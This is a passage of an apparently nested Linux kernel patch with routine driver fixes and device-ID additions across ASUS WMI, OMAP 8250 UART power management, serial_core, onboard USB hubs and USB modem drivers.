++	    code >= NOTIFY_BRNUP_MIN && code <= NOTIFY_BRNDOWN_MAX) {
++		asus_wmi_backlight_notify(asus, code);
++		return;
+ 	}
+ 
+ 	if (code == NOTIFY_KBD_BRTUP) {
+diff --git a/drivers/platform/x86/asus-wmi.h b/drivers/platform/x86/asus-wmi.h
+index a478ebfd34dfa..fc41d1b1bb7f8 100644
+--- a/drivers/platform/x86/asus-wmi.h
++++ b/drivers/platform/x86/asus-wmi.h
+@@ -18,7 +18,7 @@
+ #include <linux/i8042.h>
+ 
+ #define ASUS_WMI_KEY_IGNORE (-1)
+-#define ASUS_WMI_BRN_DOWN	0x20
++#define ASUS_WMI_BRN_DOWN	0x2e
+ #define ASUS_WMI_BRN_UP		0x2f
+ 
+ struct module;
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+index fa8f14c925ec3..9b12fe8e95c91 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+@@ -153,7 +153,7 @@ show_uncore_data(initial_max_freq_khz);
+ 
+ static int create_attr_group(struct uncore_data *data, char *name)
+ {
+-	int ret, index = 0;
++	int ret, freq, index = 0;
+ 
+ 	init_attribute_rw(max_freq_khz);
+ 	init_attribute_rw(min_freq_khz);
+@@ -165,7 +165,11 @@ static int create_attr_group(struct uncore_data *data, char *name)
+ 	data->uncore_attrs[index++] = &data->min_freq_khz_dev_attr.attr;
+ 	data->uncore_attrs[index++] = &data->initial_min_freq_khz_dev_attr.attr;
+ 	data->uncore_attrs[index++] = &data->initial_max_freq_khz_dev_attr.attr;
+-	data->uncore_attrs[index++] = &data->current_freq_khz_dev_attr.attr;
++
++	ret = uncore_read_freq(data, &freq);
++	if (!ret)
++		data->uncore_attrs[index++] = &data->current_freq_khz_dev_attr.attr;
++
+ 	data->uncore_attrs[index] = NULL;
+ 
+ 	data->uncore_attr_group.name = name;
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 68e66b60445c3..9a92d515abb9b 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -740,6 +740,21 @@ static const struct ts_dmi_data pipo_w11_data = {
+ 	.properties	= pipo_w11_props,
+ };
+ 
++static const struct property_entry positivo_c4128b_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 4),
++	PROPERTY_ENTRY_U32("touchscreen-min-y", 13),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1915),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1269),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl1680-positivo-c4128b.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	{ }
++};
++
++static const struct ts_dmi_data positivo_c4128b_data = {
++	.acpi_name	= "MSSL1680:00",
++	.properties	= positivo_c4128b_props,
++};
++
+ static const struct property_entry pov_mobii_wintab_p800w_v20_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-min-x", 32),
+ 	PROPERTY_ENTRY_U32("touchscreen-min-y", 16),
+@@ -1457,6 +1472,14 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_VERSION, "MOMO.G.WI71C.MABMRBA02"),
+ 		},
+ 	},
++	{
++		/* Positivo C4128B */
++		.driver_data = (void *)&positivo_c4128b_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Positivo Tecnologia SA"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "C4128B-1"),
++		},
++	},
+ 	{
+ 		/* Point of View mobii wintab p800w (v2.0) */
+ 		.driver_data = (void *)&pov_mobii_wintab_p800w_v20_data,
+diff --git a/drivers/power/reset/Kconfig b/drivers/power/reset/Kconfig
+index a8c46ba5878fe..54201f0374104 100644
+--- a/drivers/power/reset/Kconfig
++++ b/drivers/power/reset/Kconfig
+@@ -299,7 +299,7 @@ config NVMEM_REBOOT_MODE
+ 
+ config POWER_MLXBF
+ 	tristate "Mellanox BlueField power handling driver"
+-	depends on (GPIO_MLXBF2 && ACPI)
++	depends on (GPIO_MLXBF2 || GPIO_MLXBF3) && ACPI
+ 	help
+ 	  This driver supports reset or low power mode handling for Mellanox BlueField.
+ 
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index f6a95f72af18d..34d3d82819064 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -5725,15 +5725,11 @@ wash:
+ 	mutex_lock(&regulator_list_mutex);
+ 	regulator_ena_gpio_free(rdev);
+ 	mutex_unlock(&regulator_list_mutex);
+-	put_device(&rdev->dev);
+-	rdev = NULL;
+ clean:
+ 	if (dangling_of_gpiod)
+ 		gpiod_put(config->ena_gpiod);
+-	if (rdev && rdev->dev.of_node)
+-		of_node_put(rdev->dev.of_node);
+-	kfree(rdev);
+ 	kfree(config);
++	put_device(&rdev->dev);
+ rinse:
+ 	if (dangling_cfg_gpiod)
+ 		gpiod_put(cfg->ena_gpiod);
+diff --git a/drivers/s390/cio/css.c b/drivers/s390/cio/css.c
+index c7db953985002..98a14c1f3d672 100644
+--- a/drivers/s390/cio/css.c
++++ b/drivers/s390/cio/css.c
+@@ -233,17 +233,19 @@ struct subchannel *css_alloc_subchannel(struct subchannel_id schid,
+ 	 */
+ 	ret = dma_set_coherent_mask(&sch->dev, DMA_BIT_MASK(31));
+ 	if (ret)
+-		goto err;
++		goto err_lock;
+ 	/*
+ 	 * But we don't have such restrictions imposed on the stuff that
+ 	 * is handled by the streaming API.
+ 	 */
+ 	ret = dma_set_mask(&sch->dev, DMA_BIT_MASK(64));
+ 	if (ret)
+-		goto err;
++		goto err_lock;
+ 
+ 	return sch;
+ 
++err_lock:
++	kfree(sch->lock);
+ err:
+ 	kfree(sch);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c
+index adc85e250822c..2e21f74a24705 100644
+--- a/drivers/tty/serial/8250/8250_omap.c
++++ b/drivers/tty/serial/8250/8250_omap.c
+@@ -32,6 +32,7 @@
+ #include "8250.h"
+ 
+ #define DEFAULT_CLK_SPEED	48000000
++#define OMAP_UART_REGSHIFT	2
+ 
+ #define UART_ERRATA_i202_MDR1_ACCESS	(1 << 0)
+ #define OMAP_UART_WER_HAS_TX_WAKEUP	(1 << 1)
+@@ -109,6 +110,7 @@
+ #define UART_OMAP_RX_LVL		0x19
+ 
+ struct omap8250_priv {
++	void __iomem *membase;
+ 	int line;
+ 	u8 habit;
+ 	u8 mdr1;
+@@ -152,9 +154,9 @@ static void omap_8250_rx_dma_flush(struct uart_8250_port *p);
+ static inline void omap_8250_rx_dma_flush(struct uart_8250_port *p) { }
+ #endif
+ 
+-static u32 uart_read(struct uart_8250_port *up, u32 reg)
++static u32 uart_read(struct omap8250_priv *priv, u32 reg)
+ {
+-	return readl(up->port.membase + (reg << up->port.regshift));
++	return readl(priv->membase + (reg << OMAP_UART_REGSHIFT));
+ }
+ 
+ /*
+@@ -538,7 +540,7 @@ static void omap_serial_fill_features_erratas(struct uart_8250_port *up,
+ 	u32 mvr, scheme;
+ 	u16 revision, major, minor;
+ 
+-	mvr = uart_read(up, UART_OMAP_MVER);
++	mvr = uart_read(priv, UART_OMAP_MVER);
+ 
+ 	/* Check revision register scheme */
+ 	scheme = mvr >> OMAP_UART_MVR_SCHEME_SHIFT;
+@@ -1319,7 +1321,7 @@ static int omap8250_probe(struct platform_device *pdev)
+ 		UPF_HARD_FLOW;
+ 	up.port.private_data = priv;
+ 
+-	up.port.regshift = 2;
++	up.port.regshift = OMAP_UART_REGSHIFT;
+ 	up.port.fifosize = 64;
+ 	up.tx_loadsz = 64;
+ 	up.capabilities = UART_CAP_FIFO;
+@@ -1381,6 +1383,8 @@ static int omap8250_probe(struct platform_device *pdev)
+ 			 DEFAULT_CLK_SPEED);
+ 	}
+ 
++	priv->membase = membase;
++	priv->line = -ENODEV;
+ 	priv->latency = PM_QOS_CPU_LATENCY_DEFAULT_VALUE;
+ 	priv->calc_latency = PM_QOS_CPU_LATENCY_DEFAULT_VALUE;
+ 	cpu_latency_qos_add_request(&priv->pm_qos_request, priv->latency);
+@@ -1388,6 +1392,8 @@ static int omap8250_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&priv->rx_dma_lock);
+ 
++	platform_set_drvdata(pdev, priv);
++
+ 	device_init_wakeup(&pdev->dev, true);
+ 	pm_runtime_enable(&pdev->dev);
+ 	pm_runtime_use_autosuspend(&pdev->dev);
+@@ -1449,7 +1455,6 @@ static int omap8250_probe(struct platform_device *pdev)
+ 		goto err;
+ 	}
+ 	priv->line = ret;
+-	platform_set_drvdata(pdev, priv);
+ 	pm_runtime_mark_last_busy(&pdev->dev);
+ 	pm_runtime_put_autosuspend(&pdev->dev);
+ 	return 0;
+@@ -1471,17 +1476,17 @@ static int omap8250_remove(struct platform_device *pdev)
+ 	if (err)
+ 		return err;
+ 
++	serial8250_unregister_port(priv->line);
++	priv->line = -ENODEV;
+ 	pm_runtime_dont_use_autosuspend(&pdev->dev);
+ 	pm_runtime_put_sync(&pdev->dev);
+ 	flush_work(&priv->qos_work);
+ 	pm_runtime_disable(&pdev->dev);
+-	serial8250_unregister_port(priv->line);
+ 	cpu_latency_qos_remove_request(&priv->pm_qos_request);
+ 	device_init_wakeup(&pdev->dev, false);
+ 	return 0;
+ }
+ 
+-#ifdef CONFIG_PM_SLEEP
+ static int omap8250_prepare(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+@@ -1505,7 +1510,7 @@ static int omap8250_suspend(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+ 	struct uart_8250_port *up = serial8250_get_port(priv->line);
+-	int err;
++	int err = 0;
+ 
+ 	serial8250_suspend_port(priv->line);
+ 
+@@ -1515,7 +1520,8 @@ static int omap8250_suspend(struct device *dev)
+ 	if (!device_may_wakeup(dev))
+ 		priv->wer = 0;
+ 	serial_out(up, UART_OMAP_WER, priv->wer);
+-	err = pm_runtime_force_suspend(dev);
++	if (uart_console(&up->port) && console_suspend_enabled)
++		err = pm_runtime_force_suspend(dev);
+ 	flush_work(&priv->qos_work);
+ 
+ 	return err;
+@@ -1524,11 +1530,15 @@ static int omap8250_suspend(struct device *dev)
+ static int omap8250_resume(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
++	struct uart_8250_port *up = serial8250_get_port(priv->line);
+ 	int err;
+ 
+-	err = pm_runtime_force_resume(dev);
+-	if (err)
+-		return err;
++	if (uart_console(&up->port) && console_suspend_enabled) {
++		err = pm_runtime_force_resume(dev);
++		if (err)
++			return err;
++	}
++
+ 	serial8250_resume_port(priv->line);
+ 	/* Paired with pm_runtime_resume_and_get() in omap8250_suspend() */
+ 	pm_runtime_mark_last_busy(dev);
+@@ -1536,12 +1546,7 @@ static int omap8250_resume(struct device *dev)
+ 
+ 	return 0;
+ }
+-#else
+-#define omap8250_prepare NULL
+-#define omap8250_complete NULL
+-#endif
+ 
+-#ifdef CONFIG_PM
+ static int omap8250_lost_context(struct uart_8250_port *up)
+ {
+ 	u32 val;
+@@ -1557,11 +1562,15 @@ static int omap8250_lost_context(struct uart_8250_port *up)
+ 	return 0;
+ }
+ 
++static void uart_write(struct omap8250_priv *priv, u32 reg, u32 val)
++{
++	writel(val, priv->membase + (reg << OMAP_UART_REGSHIFT));
++}
++
+ /* TODO: in future, this should happen via API in drivers/reset/ */
+ static int omap8250_soft_reset(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+-	struct uart_8250_port *up = serial8250_get_port(priv->line);
+ 	int timeout = 100;
+ 	int sysc;
+ 	int syss;
+@@ -1575,20 +1584,20 @@ static int omap8250_soft_reset(struct device *dev)
+ 	 * needing omap8250_soft_reset() quirk. Do it in two writes as
+ 	 * recommended in the comment for omap8250_update_scr().
+ 	 */
+-	serial_out(up, UART_OMAP_SCR, OMAP_UART_SCR_DMAMODE_1);
+-	serial_out(up, UART_OMAP_SCR,
++	uart_write(priv, UART_OMAP_SCR, OMAP_UART_SCR_DMAMODE_1);
++	uart_write(priv, UART_OMAP_SCR,
+ 		   OMAP_UART_SCR_DMAMODE_1 | OMAP_UART_SCR_DMAMODE_CTL);
+ 
+-	sysc = serial_in(up, UART_OMAP_SYSC);
++	sysc = uart_read(priv, UART_OMAP_SYSC);
+ 
+ 	/* softreset the UART */
+ 	sysc |= OMAP_UART_SYSC_SOFTRESET;
+-	serial_out(up, UART_OMAP_SYSC, sysc);
++	uart_write(priv, UART_OMAP_SYSC, sysc);
+ 
+ 	/* By experiments, 1us enough for reset complete on AM335x */
+ 	do {
+ 		udelay(1);
+-		syss = serial_in(up, UART_OMAP_SYSS);
++		syss = uart_read(priv, UART_OMAP_SYSS);
+ 	} while (--timeout && !(syss & OMAP_UART_SYSS_RESETDONE));
+ 
+ 	if (!timeout) {
+@@ -1602,23 +1611,10 @@ static int omap8250_soft_reset(struct device *dev)
+ static int omap8250_runtime_suspend(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+-	struct uart_8250_port *up;
++	struct uart_8250_port *up = NULL;
+ 
+-	/* In case runtime-pm tries this before we are setup */
+-	if (!priv)
+-		return 0;
+-
+-	up = serial8250_get_port(priv->line);
+-	/*
+-	 * When using 'no_console_suspend', the console UART must not be
+-	 * suspended. Since driver suspend is managed by runtime suspend,
+-	 * preventing runtime suspend (by returning error) will keep device
+-	 * active during suspend.
+-	 */
+-	if (priv->is_suspending && !console_suspend_enabled) {
+-		if (uart_console(&up->port))
+-			return -EBUSY;
+-	}
++	if (priv->line >= 0)
++		up = serial8250_get_port(priv->line);
+ 
+ 	if (priv->habit & UART_ERRATA_CLOCK_DISABLE) {
+ 		int ret;
+@@ -1627,13 +1623,15 @@ static int omap8250_runtime_suspend(struct device *dev)
+ 		if (ret)
+ 			return ret;
+ 
+-		/* Restore to UART mode after reset (for wakeup) */
+-		omap8250_update_mdr1(up, priv);
+-		/* Restore wakeup enable register */
+-		serial_out(up, UART_OMAP_WER, priv->wer);
++		if (up) {
++			/* Restore to UART mode after reset (for wakeup) */
++			omap8250_update_mdr1(up, priv);
++			/* Restore wakeup enable register */
++			serial_out(up, UART_OMAP_WER, priv->wer);
++		}
+ 	}
+ 
+-	if (up->dma && up->dma->rxchan)
++	if (up && up->dma && up->dma->rxchan)
+ 		omap_8250_rx_dma_flush(up);
+ 
+ 	priv->latency = PM_QOS_CPU_LATENCY_DEFAULT_VALUE;
+@@ -1645,25 +1643,21 @@ static int omap8250_runtime_suspend(struct device *dev)
+ static int omap8250_runtime_resume(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+-	struct uart_8250_port *up;
++	struct uart_8250_port *up = NULL;
+ 
+-	/* In case runtime-pm tries this before we are setup */
+-	if (!priv)
+-		return 0;
+-
+-	up = serial8250_get_port(priv->line);
++	if (priv->line >= 0)
++		up = serial8250_get_port(priv->line);
+ 
+-	if (omap8250_lost_context(up))
++	if (up && omap8250_lost_context(up))
+ 		omap8250_restore_regs(up);
+ 
+-	if (up->dma && up->dma->rxchan && !(priv->habit & UART_HAS_EFR2))
++	if (up && up->dma && up->dma->rxchan && !(priv->habit & UART_HAS_EFR2))
+ 		omap_8250_rx_dma(up);
+ 
+ 	priv->latency = priv->calc_latency;
+ 	schedule_work(&priv->qos_work);
+ 	return 0;
+ }
+-#endif
+ 
+ #ifdef CONFIG_SERIAL_8250_OMAP_TTYO_FIXUP
+ static int __init omap8250_console_fixup(void)
+@@ -1706,17 +1700,17 @@ console_initcall(omap8250_console_fixup);
+ #endif
+ 
+ static const struct dev_pm_ops omap8250_dev_pm_ops = {
+-	SET_SYSTEM_SLEEP_PM_OPS(omap8250_suspend, omap8250_resume)
+-	SET_RUNTIME_PM_OPS(omap8250_runtime_suspend,
++	SYSTEM_SLEEP_PM_OPS(omap8250_suspend, omap8250_resume)
++	RUNTIME_PM_OPS(omap8250_runtime_suspend,
+ 			   omap8250_runtime_resume, NULL)
+-	.prepare        = omap8250_prepare,
+-	.complete       = omap8250_complete,
++	.prepare        = pm_sleep_ptr(omap8250_prepare),
++	.complete       = pm_sleep_ptr(omap8250_complete),
+ };
+ 
+ static struct platform_driver omap8250_platform_driver = {
+ 	.driver = {
+ 		.name		= "omap8250",
+-		.pm		= &omap8250_dev_pm_ops,
++		.pm		= pm_ptr(&omap8250_dev_pm_ops),
+ 		.of_match_table = omap8250_dt_ids,
+ 	},
+ 	.probe			= omap8250_probe,
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index 2cc5c68c8689f..d4e57f9017db9 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -48,8 +48,6 @@ static struct lock_class_key port_lock_key;
+  */
+ #define RS485_MAX_RTS_DELAY	100 /* msecs */
+ 
+-static void uart_change_speed(struct tty_struct *tty, struct uart_state *state,
+-			      const struct ktermios *old_termios);
+ static void uart_wait_until_sent(struct tty_struct *tty, int timeout);
+ static void uart_change_pm(struct uart_state *state,
+ 			   enum uart_pm_state pm_state);
+@@ -177,6 +175,52 @@ static void uart_port_dtr_rts(struct uart_port *uport, int raise)
+ 		uart_clear_mctrl(uport, TIOCM_DTR | TIOCM_RTS);
+ }
+ 
++/* Caller holds port mutex */
++static void uart_change_line_settings(struct tty_struct *tty, struct uart_state *state,
++				      const struct ktermios *old_termios)
++{
++	struct uart_port *uport = uart_port_check(state);
++	struct ktermios *termios;
++	int hw_stopped;
++
++	/*
++	 * If we have no tty, termios, or the port does not exist,
++	 * then we can't set the parameters for this port.
++	 */
++	if (!tty || uport->type == PORT_UNKNOWN)
++		return;
++
++	termios = &tty->termios;
++	uport->ops->set_termios(uport, termios, old_termios);
++
++	/*
++	 * Set modem status enables based on termios cflag
++	 */
++	spin_lock_irq(&uport->lock);
++	if (termios->c_cflag & CRTSCTS)
++		uport->status |= UPSTAT_CTS_ENABLE;
++	else
++		uport->status &= ~UPSTAT_CTS_ENABLE;
++
++	if (termios->c_cflag & CLOCAL)
++		uport->status &= ~UPSTAT_DCD_ENABLE;
++	else
++		uport->status |= UPSTAT_DCD_ENABLE;
++
++	/* reset sw-assisted CTS flow control based on (possibly) new mode */
++	hw_stopped = uport->hw_stopped;
++	uport->hw_stopped = uart_softcts_mode(uport) &&
++			    !(uport->ops->get_mctrl(uport) & TIOCM_CTS);
++	if (uport->hw_stopped) {
++		if (!hw_stopped)
++			uport->ops->stop_tx(uport);
++	} else {
++		if (hw_stopped)
++			__uart_start(tty);
++	}
++	spin_unlock_irq(&uport->lock);
++}
++
+ /*
+  * Startup the port.  This will be called once per open.  All calls
+  * will be serialised by the per-port mutex.
+@@ -232,7 +276,7 @@ static int uart_port_startup(struct tty_struct *tty, struct uart_state *state,
+ 		/*
+ 		 * Initialise the hardware port settings.
+ 		 */
+-		uart_change_speed(tty, state, NULL);
++		uart_change_line_settings(tty, state, NULL);
+ 
+ 		/*
+ 		 * Setup the RTS and DTR signals once the
+@@ -485,52 +529,6 @@ uart_get_divisor(struct uart_port *port, unsigned int baud)
+ }
+ EXPORT_SYMBOL(uart_get_divisor);
+ 
+-/* Caller holds port mutex */
+-static void uart_change_speed(struct tty_struct *tty, struct uart_state *state,
+-			      const struct ktermios *old_termios)
+-{
+-	struct uart_port *uport = uart_port_check(state);
+-	struct ktermios *termios;
+-	int hw_stopped;
+-
+-	/*
+-	 * If we have no tty, termios, or the port does not exist,
+-	 * then we can't set the parameters for this port.
+-	 */
+-	if (!tty || uport->type == PORT_UNKNOWN)
+-		return;
+-
+-	termios = &tty->termios;
+-	uport->ops->set_termios(uport, termios, old_termios);
+-
+-	/*
+-	 * Set modem status enables based on termios cflag
+-	 */
+-	spin_lock_irq(&uport->lock);
+-	if (termios->c_cflag & CRTSCTS)
+-		uport->status |= UPSTAT_CTS_ENABLE;
+-	else
+-		uport->status &= ~UPSTAT_CTS_ENABLE;
+-
+-	if (termios->c_cflag & CLOCAL)
+-		uport->status &= ~UPSTAT_DCD_ENABLE;
+-	else
+-		uport->status |= UPSTAT_DCD_ENABLE;
+-
+-	/* reset sw-assisted CTS flow control based on (possibly) new mode */
+-	hw_stopped = uport->hw_stopped;
+-	uport->hw_stopped = uart_softcts_mode(uport) &&
+-				!(uport->ops->get_mctrl(uport) & TIOCM_CTS);
+-	if (uport->hw_stopped) {
+-		if (!hw_stopped)
+-			uport->ops->stop_tx(uport);
+-	} else {
+-		if (hw_stopped)
+-			__uart_start(tty);
+-	}
+-	spin_unlock_irq(&uport->lock);
+-}
+-
+ static int uart_put_char(struct tty_struct *tty, unsigned char c)
+ {
+ 	struct uart_state *state = tty->driver_data;
+@@ -994,7 +992,7 @@ static int uart_set_info(struct tty_struct *tty, struct tty_port *port,
+ 				      current->comm,
+ 				      tty_name(port->tty));
+ 			}
+-			uart_change_speed(tty, state, NULL);
++			uart_change_line_settings(tty, state, NULL);
+ 		}
+ 	} else {
+ 		retval = uart_startup(tty, state, 1);
+@@ -1389,12 +1387,18 @@ static void uart_set_rs485_termination(struct uart_port *port,
+ static int uart_rs485_config(struct uart_port *port)
+ {
+ 	struct serial_rs485 *rs485 = &port->rs485;
++	unsigned long flags;
+ 	int ret;
+ 
++	if (!(rs485->flags & SER_RS485_ENABLED))
++		return 0;
++
+ 	uart_sanitize_serial_rs485(port, rs485);
+ 	uart_set_rs485_termination(port, rs485);
+ 
++	spin_lock_irqsave(&port->lock, flags);
+ 	ret = port->rs485_config(port, NULL, rs485);
++	spin_unlock_irqrestore(&port->lock, flags);
+ 	if (ret)
+ 		memset(rs485, 0, sizeof(*rs485));
+ 
+@@ -1656,7 +1660,7 @@ static void uart_set_termios(struct tty_struct *tty,
+ 		goto out;
+ 	}
+ 
+-	uart_change_speed(tty, state, old_termios);
++	uart_change_line_settings(tty, state, old_termios);
+ 	/* reload cflag from termios; port driver may have overridden flags */
+ 	cflag = tty->termios.c_cflag;
+ 
+@@ -2456,12 +2460,11 @@ int uart_resume_port(struct uart_driver *drv, struct uart_port *uport)
+ 			ret = ops->startup(uport);
+ 			if (ret == 0) {
+ 				if (tty)
+-					uart_change_speed(tty, state, NULL);
++					uart_change_line_settings(tty, state, NULL);
++				uart_rs485_config(uport);
+ 				spin_lock_irq(&uport->lock);
+ 				if (!(uport->rs485.flags & SER_RS485_ENABLED))
+ 					ops->set_mctrl(uport, uport->mctrl);
+-				else
+-					uart_rs485_config(uport);
+ 				ops->start_tx(uport);
+ 				spin_unlock_irq(&uport->lock);
+ 				tty_port_set_initialized(port, 1);
+@@ -2570,10 +2573,10 @@ uart_configure_port(struct uart_driver *drv, struct uart_state *state,
+ 		port->mctrl &= TIOCM_DTR;
+ 		if (!(port->rs485.flags & SER_RS485_ENABLED))
+ 			port->ops->set_mctrl(port, port->mctrl);
+-		else
+-			uart_rs485_config(port);
+ 		spin_unlock_irqrestore(&port->lock, flags);
+ 
++		uart_rs485_config(port);
++
+ 		/*
+ 		 * If this driver supports console, and it hasn't been
+ 		 * successfully registered yet, try to re-register it.
+diff --git a/drivers/usb/misc/onboard_usb_hub.c b/drivers/usb/misc/onboard_usb_hub.c
+index 832d3ba9368ff..8edd0375e0a8a 100644
+--- a/drivers/usb/misc/onboard_usb_hub.c
++++ b/drivers/usb/misc/onboard_usb_hub.c
+@@ -329,6 +329,7 @@ static struct platform_driver onboard_hub_driver = {
+ 
+ /************************** USB driver **************************/
+ 
++#define VENDOR_ID_GENESYS	0x05e3
+ #define VENDOR_ID_MICROCHIP	0x0424
+ #define VENDOR_ID_REALTEK	0x0bda
+ #define VENDOR_ID_TI		0x0451
+@@ -405,6 +406,10 @@ static void onboard_hub_usbdev_disconnect(struct usb_device *udev)
+ }
+ 
+ static const struct usb_device_id onboard_hub_id_table[] = {
++	{ USB_DEVICE(VENDOR_ID_GENESYS, 0x0608) }, /* Genesys Logic GL850G USB 2.0 */
++	{ USB_DEVICE(VENDOR_ID_GENESYS, 0x0610) }, /* Genesys Logic GL852G USB 2.0 */
++	{ USB_DEVICE(VENDOR_ID_GENESYS, 0x0620) }, /* Genesys Logic GL3523 USB 3.1 */
++	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2412) }, /* USB2412 USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2514) }, /* USB2514B USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2517) }, /* USB2517 USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x0411) }, /* RTS5411 USB 3.1 */
+diff --git a/drivers/usb/misc/onboard_usb_hub.h b/drivers/usb/misc/onboard_usb_hub.h
+index 2cde54b69eede..d023fb90b4118 100644
+--- a/drivers/usb/misc/onboard_usb_hub.h
++++ b/drivers/usb/misc/onboard_usb_hub.h
+@@ -22,11 +22,23 @@ static const struct onboard_hub_pdata ti_tusb8041_data = {
+ 	.reset_us = 3000,
+ };
+ 
++static const struct onboard_hub_pdata genesys_gl850g_data = {
++	.reset_us = 3,
++};
++
++static const struct onboard_hub_pdata genesys_gl852g_data = {
++	.reset_us = 50,
++};
++
+ static const struct of_device_id onboard_hub_match[] = {
++	{ .compatible = "usb424,2412", .data = &microchip_usb424_data, },
+ 	{ .compatible = "usb424,2514", .data = &microchip_usb424_data, },
+ 	{ .compatible = "usb424,2517", .data = &microchip_usb424_data, },
+ 	{ .compatible = "usb451,8140", .data = &ti_tusb8041_data, },
+ 	{ .compatible = "usb451,8142", .data = &ti_tusb8041_data, },
++	{ .compatible = "usb5e3,608", .data = &genesys_gl850g_data, },
++	{ .compatible = "usb5e3,610", .data = &genesys_gl852g_data, },
++	{ .compatible = "usb5e3,620", .data = &genesys_gl852g_data, },
+ 	{ .compatible = "usbbda,411", .data = &realtek_rts5411_data, },
+ 	{ .compatible = "usbbda,5411", .data = &realtek_rts5411_data, },
+ 	{ .compatible = "usbbda,414", .data = &realtek_rts5411_data, },
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index f13930b4534c1..b9dd714a3ae69 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -203,6 +203,9 @@ static void option_instat_callback(struct urb *urb);
+ #define DELL_PRODUCT_5829E_ESIM			0x81e4
+ #define DELL_PRODUCT_5829E			0x81e6
+ 
++#define DELL_PRODUCT_FM101R			0x8213
++#define DELL_PRODUCT_FM101R_ESIM		0x8215
++
+ #define KYOCERA_VENDOR_ID			0x0c88
+ #define KYOCERA_PRODUCT_KPC650			0x17da
+ #define KYOCERA_PRODUCT_KPC680			0x180a
+@@ -1108,6 +1111,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(0) | RSVD(6) },
+ 	{ USB_DEVICE(DELL_VENDOR_ID, DELL_PRODUCT_5829E_ESIM),
+ 	  .driver_info = RSVD(0) | RSVD(6) },
++	{ USB_DEVICE_INTERFACE_CLASS(DELL_VENDOR_ID, DELL_PRODUCT_FM101R, 0xff) },
++	{ USB_DEVICE_INTERFACE_CLASS(DELL_VENDOR_ID, DELL_PRODUCT_FM101R_ESIM, 0xff) },
+ 	{ USB_DEVICE(ANYDATA_VENDOR_ID, ANYDATA_PRODUCT_ADU_E100A) },	/* ADU-E100, ADU-310 */
+ 	{ USB_DEVICE(ANYDATA_VENDOR_ID, ANYDATA_PRODUCT_ADU_500A) },
+ 	{ USB_DEVICE(ANYDATA_VENDOR_ID, ANYDATA_PRODUCT_ADU_620UW) },
+@@ -1290,6 +1295,7 @@ static const struct usb_device_id option_ids[] = {
+ 	 .driver_info = NCTRL(0) | RSVD(3) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1033, 0xff),	/* Telit LE910C1-EUX (ECM) */
+ 	 .driver_info = NCTRL(0) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1035, 0xff) }, /* Telit LE910C4-WWX (ECM) */
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_LE922_USBCFG0),
+ 	  .driver_info = RSVD(0) | RSVD(1) | NCTRL(2) | RSVD(3) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_LE922_USBCFG1),
+@@ -2262,6 +2268,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x305a, 0x1406, 0xff) },			/* GosunCn GM500 ECM/NCM */
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(OPPO_VENDOR_ID, OPPO_PRODUCT_R11, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
+ 	{ } /* Terminating entry */
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index 1a327eb3580b4..e08688844f1e1 100644
